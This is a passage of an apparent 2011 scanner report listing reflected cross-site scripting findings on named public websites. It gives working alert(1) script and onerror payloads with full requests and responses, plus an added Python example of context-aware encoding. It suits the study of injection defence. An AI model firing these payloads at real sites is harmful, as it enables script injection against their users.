s.pageType="errorPage";
if(!s.channel) s.channel="5f36e";b89bfbb523a";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...

3.40. http://www.elyrics.net/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac896<script>alert(1)</script>f28f1124825 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusac896<script>alert(1)</script>f28f1124825 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:58:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1175
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
   <a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/server-statusac896<script>alert(1)</script>f28f1124825</font>
...[SNIP]...

3.41. http://www.elyrics.net/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4385<script>alert(1)</script>25840b24127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?e4385<script>alert(1)</script>25840b24127=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1178
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
   <a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/server-status?e4385<script>alert(1)</script>25840b24127=1</font>
...[SNIP]...

3.42. http://www.foreignpolicy.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foreignpolicy.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d74"><script>alert(1)</script>bf786f3728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd8d74"><script>alert(1)</script>bf786f3728 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foreignpolicy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=600
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301711396"
Last-Modified: Sat, 02 Apr 2011 02:29:56 GMT
X-AH-Environment: prod
Content-Length: 34307
Date: Sat, 02 Apr 2011 02:29:56 GMT
X-Varnish: 1611585047
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<meta property="og:url" content="http://www.foreignpolicy.com/server-statusd8d74"><script>alert(1)</script>bf786f3728"/>
...[SNIP]...

3.43. http://www.foreignpolicy.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foreignpolicy.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe716"-alert(1)-"4e07d34ce49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusfe716"-alert(1)-"4e07d34ce49 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foreignpolicy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=600
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301711397"
Last-Modified: Sat, 02 Apr 2011 02:29:57 GMT
X-AH-Environment: prod
Content-Length: 34279
Date: Sat, 02 Apr 2011 02:29:57 GMT
X-Varnish: 1611585179
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<!--
s.pageName="fp - /server-statusfe716"-alert(1)-"4e07d34ce49";
s.channel="fp - unknown";
s.hier1="www | uncategorized";
s.hier2="foreignpolicy.com | www | uncategorized";
s.prop2="";
s.prop3="article";
s.prop5="";
s.prop12="";
s.prop25="";
s.prop32="drupal";
s.
...[SNIP]...

3.44. http://www.gamespot.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4962"><script>alert(1)</script>46b1785cfba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusc4962"><script>alert(1)</script>46b1785cfba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:46:06 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 02:46:06 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040111=2; expires=Tue, 05-Apr-2011 02:46:06 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/server-statusc4962"><script>alert(1)</script>46b1785cfba" />
...[SNIP]...

3.45. http://www.gamestop.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc2d5'%20a%3db%20fd858b9849e was submitted in the REST URL parameter 1. This input was echoed as cc2d5' a=b fd858b9849e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-statuscc2d5'%20a%3db%20fd858b9849e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:55:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 02:55:11 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: CampaignHistory=; path=/
Content-Length: 181776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com:80/server-statuscc2d5' a=b fd858b9849e' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

3.46. http://www.gamestop.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3791f'><script>alert(1)</script>3fcd38dd666 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?3791f'><script>alert(1)</script>3fcd38dd666=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:54:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 02:54:53 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: CampaignHistory=; path=/
Content-Length: 181839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com:80/server-status?3791f'><script>alert(1)</script>3fcd38dd666=1' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

3.47. http://www.gather.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a069f"><a>fa73276c69b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-statusa069f"><a>fa73276c69b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=0BF6138D3014E466E27114273C8EC136; Domain=.gather.com; Path=/
Set-Cookie: vis=o0JaG/eewVZTRguqPAsipjl9Szxiq8W6qeCiGW8xw8ln+1Xp1O0ABnI+4A91R97CvVOiiY6bS5AUL8v4iSkMbJ8E6gC5VfIFo33vvcd0rlI=; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:07 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=s6btjABk/s9Ri5yFfKHe80g4Xd0MiyH5cmyyIytVeY+nxKpwwPnFg+oSPJPTU7PvJM7B0c1otwa4Yf3fdjYqAHZiseT1+HY3In+b+nwbmwjXpqvLrspIJivolikGDxhY; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:07 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17498
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="server-statusa069f"><a>fa73276c69b" >
...[SNIP]...

3.48. http://www.gather.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db044<img%20src%3da%20onerror%3dalert(1)>5fc9a5d41a was submitted in the REST URL parameter 1. This input was echoed as db044<img src=a onerror=alert(1)>5fc9a5d41a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-statusdb044<img%20src%3da%20onerror%3dalert(1)>5fc9a5d41a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:56:25 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=6C84C2B1F8D16A96A14EFF99C223B1B8; Domain=.gather.com; Path=/
Set-Cookie: vis=J94I6mgdUTkPLLKnAGEiqu/+cnGw4e9HDdERbR5VKWBSHjh1NEKCzF/9Abwh5bXIzHTVbJ7nNHapgFGgAa9IpDRxV8mh14nO3zg+0/wJFew=; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:25 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=v1SxHsqgDSj9jyXNwO0Ajw4UGwmlx/HffDfX3+nIUKyAsnoMXEaSiIqJNcCPelIkXpv2tgjgPMpv6eZya4IWGr3oOrcxfYwepOPopZQOsUpCGKXTExbfVXOvn2S7561W; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:25 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17580
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>server-statusdb044<img src=a onerror=alert(1)>5fc9a5d41a</em>
...[SNIP]...

3.49. http://www.groupfusion.net/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupfusion.net
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8838b<script>alert(1)</script>dc3ccf4c169 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status8838b<script>alert(1)</script>dc3ccf4c169 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.groupfusion.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:11:12 GMT
Server: Apache/2.2.8 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 293

<html><body><b>The page you requested:<br/><i>www.groupfusion.net/server-status8838b<script>alert(1)</script>dc3ccf4c169</i><br/> does not exist on www.groupfusion.net<br />Please click <a href='http:
...[SNIP]...

3.50. http://www.hawaii.edu/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5507a"><script>alert(1)</script>921f6b033f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status5507a"><script>alert(1)</script>921f6b033f3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hawaii.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:42:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6367
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/server-status5507a"><script>alert(1)</script>921f6b033f3" size="60">
...[SNIP]...

3.51. http://www.hawaii.edu/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97987"><script>alert(1)</script>a396d6b5b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?97987"><script>alert(1)</script>a396d6b5b4b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hawaii.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:42:02 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6370
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/server-status?97987"><script>alert(1)</script>a396d6b5b4b=1" size="60">
...[SNIP]...

3.52. http://www.instructables.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eae87<script>alert(1)</script>cfdb657e7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statuseae87<script>alert(1)</script>cfdb657e7b7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Content-Length: 17718
Cache-Control: no-cache
X-Cacheable: no-404
Date: Sat, 02 Apr 2011 03:00:56 GMT
X-Varnish: 789779472
Age: 1
Via: 1.1 varnish
X-Cache-Svr: squid04.instructables.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<p>
&nbsp;&nbsp;We're sorry, the URL http://www.instructables.com/server-statuseae87<script>alert(1)</script>cfdb657e7b7 is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below.
</p>
...[SNIP]...

3.53. http://www.jotform.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jotform.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0e3f<script>alert(1)</script>ce8807e8a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusa0e3f<script>alert(1)</script>ce8807e8a60 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jotform.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 02:22:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Status: 404 Not Found
Vary: Accept-Encoding
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL "server-statusa0e3f<script>alert(1)</script>ce8807e8a60" was not found on this server.</p>
...[SNIP]...

3.54. http://www.listal.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.listal.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 580f0'><script>alert(1)</script>bc57259f36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status580f0'><script>alert(1)</script>bc57259f36b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.listal.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.0
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Sat, 02 Apr 2011 02:12:57 GMT
Server: lighttpd/1.4.23
Content-Length: 12464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<input type='hidden' name='backurl' value='http://www.listal.com/server-status580f0'><script>alert(1)</script>bc57259f36b' />
...[SNIP]...

3.55. http://www.listal.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.listal.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a401f'><script>alert(1)</script>6114f0f3f02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?a401f'><script>alert(1)</script>6114f0f3f02=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.listal.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.0
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Sat, 02 Apr 2011 02:12:46 GMT
Server: lighttpd/1.4.23
Content-Length: 12467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<input type='hidden' name='backurl' value='http://www.listal.com/server-status?a401f'><script>alert(1)</script>6114f0f3f02=1' />
...[SNIP]...
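The reflections in 3.49 to 3.55 differ only in the HTML context the path lands in: a text node (3.49, 3.52, 3.53), a double-quoted attribute value (3.50, 3.51) or a single-quoted attribute value (3.54, 3.55), and the encoding that neutralises the input depends on that context. The following Python is an added example, not code from the report or from any of the scanned sites: the vulnerable_* templates are constructed stand-ins modelled on the single reflected line each 404 page showed, the payloads are the ones the report submitted, and active_content() parses the result the way a browser would to show which version still carries a script tag or an on* event handler.

```python
"""Context-aware output encoding for the reflections in 3.49 to 3.55.

Added example; not code from the report or from any scanned site. The three
vulnerable_* functions are constructed stand-ins modelled on the single
reflected line each 404 page showed, not the sites' real templates.
"""
import html
from html.parser import HTMLParser

# Payloads copied from the report's issue details.
PAYLOAD_TEXT = "8838b<script>alert(1)</script>dc3ccf4c169"      # 3.49: text between tags
PAYLOAD_IMG = "db044<img src=a onerror=alert(1)>5fc9a5d41a"      # 3.48: event handler, no <script>
PAYLOAD_DQ = '5507a"><script>alert(1)</script>921f6b033f3'       # 3.50: double-quoted attribute
PAYLOAD_SQ = "580f0'><script>alert(1)</script>bc57259f36b"       # 3.54: single-quoted attribute


def vulnerable_text(path: str) -> str:
    # Like the groupfusion.net 404 page: the path is dropped straight into a text node.
    return f"<i>www.groupfusion.net/{path}</i>"


def vulnerable_dq_attr(path: str) -> str:
    # Like the hawaii.edu 404 page: the path lands inside a double-quoted value.
    return f'<input type="text" name="this" value="{path}" size="60">'


def vulnerable_sq_attr(url: str) -> str:
    # Like the listal.com 404 page: the URL lands inside a single-quoted value.
    return f"<input type='hidden' name='backurl' value='{url}' />"


def safe_text(path: str) -> str:
    # A text node only needs &, < and > encoded.
    return f"<i>www.groupfusion.net/{html.escape(path, quote=False)}</i>"


def safe_attr(path: str, quote: str = '"') -> str:
    # An attribute value also needs the quote character encoded. html.escape(quote=True)
    # encodes both " and ', so one encoder covers either quoting style.
    return f'<input type="text" name="this" value={quote}{html.escape(path, quote=True)}{quote}>'


class ActiveContentFinder(HTMLParser):
    """Records each way the parsed markup could run script: <script> start tags
    and any on* event-handler attribute, whichever tag carries it."""

    def __init__(self) -> None:
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script>")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag} {name}>")


def active_content(markup: str) -> list:
    """Parse the markup as a browser would and list the script-capable constructs."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for label, markup in [
        ("3.49 vulnerable", vulnerable_text(PAYLOAD_TEXT)),
        ("3.48 vulnerable", vulnerable_text(PAYLOAD_IMG)),
        ("3.50 vulnerable", vulnerable_dq_attr(PAYLOAD_DQ)),
        ("3.54 vulnerable", vulnerable_sq_attr("http://www.listal.com/server-status" + PAYLOAD_SQ)),
        ("3.49 fixed", safe_text(PAYLOAD_TEXT)),
        ("3.50 fixed", safe_attr(PAYLOAD_DQ)),
        ("3.54 fixed", safe_attr(PAYLOAD_SQ, quote="'")),
    ]:
        print(f"{label:16} {active_content(markup)}")
```

The point the parser makes is that encoding for the wrong context is not enough: encoding only &lt; and &gt; would stop 3.49 but leave 3.50 and 3.54 exploitable, because the attacker's quote still closes the attribute before any angle bracket is needed.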

3.56. http://www.magazines.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magazines.com
Path:   /server-status

Issue detail

